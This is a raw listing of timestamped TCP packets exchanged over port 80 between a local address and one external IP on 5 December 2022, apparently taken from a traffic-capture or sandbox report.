Dec 5, 2022 01:32:57.780472994 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.780622005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:58.547487974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:58.547904968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.705997944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.762670994 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.762732983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.762773991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.762780905 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.762814999 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.762857914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.762867928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.762867928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.762929916 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.762968063 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.762984991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.762985945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.763093948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777380943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777440071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777481079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777522087 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777553082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777564049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777595043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777595043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777607918 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777651072 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777690887 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777709961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777709961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777734041 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777775049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777790070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777790070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777817011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777857065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777869940 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777869940 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777896881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777934074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.777937889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.777980089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778022051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778033972 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.778033972 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.778064013 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778104067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778116941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.778116941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.778145075 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778198004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.778198004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.778634071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778676033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778714895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.778729916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.778976917 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.785568953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.786272049 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792563915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792624950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792665005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792678118 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792679071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792706966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792748928 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792756081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792756081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792789936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792830944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792839050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792839050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792871952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792912960 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792927027 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792927027 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.792954922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.792994976 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793011904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793011904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793040991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793082952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793122053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793133974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793133974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793163061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793203115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793212891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793212891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793243885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793283939 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793298960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793298960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793323994 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793364048 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793374062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793375015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793406010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793445110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793457031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793457031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793484926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793524981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793538094 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793538094 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793565035 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793603897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793617964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793618917 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793643951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793651104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.793684959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.793689013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794066906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794107914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794146061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794161081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794161081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794187069 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794226885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794244051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794244051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794267893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794306993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794322014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794322014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794348001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794388056 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794404030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794404030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794429064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.794480085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.794480085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.806819916 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.806901932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.806931019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.806952953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.806988955 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.806994915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807015896 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807040930 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807085037 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807123899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807138920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807138920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807164907 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807204962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807216883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807216883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807245970 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807286024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807298899 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807298899 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807326078 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807367086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807379961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807379961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807408094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807414055 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807449102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807488918 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807502031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807502985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807535887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807590008 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807631016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807652950 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807671070 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807682037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807713032 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807754993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807770014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807770967 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807794094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807833910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807846069 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807846069 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807876110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807914972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.807928085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807928085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.807955980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808007956 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808007956 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808056116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808099985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808140993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808151960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808151960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808181047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808221102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808260918 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808280945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808280945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808303118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808320999 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808343887 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808382988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808398962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808398962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808423996 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808465004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808480024 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808480024 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808506012 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808546066 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808572054 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808572054 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808584929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808625937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808641911 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808641911 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808669090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808708906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808727980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808727980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808749914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808790922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808820963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808820963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808830976 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808866978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.808875084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.808921099 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809019089 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809143066 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809185982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809207916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809226036 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809250116 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809267044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809284925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809308052 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809341908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809348106 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809387922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809407949 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809407949 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809429884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809451103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809469938 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809509039 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809511900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809551954 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809586048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809587002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809592009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809617043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809633970 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809673071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809689999 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809689999 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809712887 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809732914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809752941 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809787035 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809794903 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809820890 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809839010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809865952 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809879065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.809901953 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.809940100 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810151100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810190916 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810229063 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810256004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810269117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810292006 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810308933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810352087 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810391903 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810431004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810434103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810434103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810470104 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810509920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810528994 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810528994 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810549974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810590982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810628891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810647964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810647964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.810668945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.810950041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821253061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821314096 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821357965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821393013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821393013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821397066 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821439028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821460009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821481943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821492910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821579933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821579933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821702003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821743965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821784973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821793079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821794033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821825981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821866989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821894884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821917057 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821917057 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.821945906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.821975946 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822036028 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822036982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822156906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822186947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822216988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822243929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822243929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822249889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822266102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822282076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822312117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822339058 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822340965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822339058 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822398901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822398901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822721958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822762966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822792053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822822094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822820902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822820902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822854042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822859049 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822904110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822916031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822916031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822935104 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.822966099 CET	80	49707	77.73.133.23	192.168.2.3
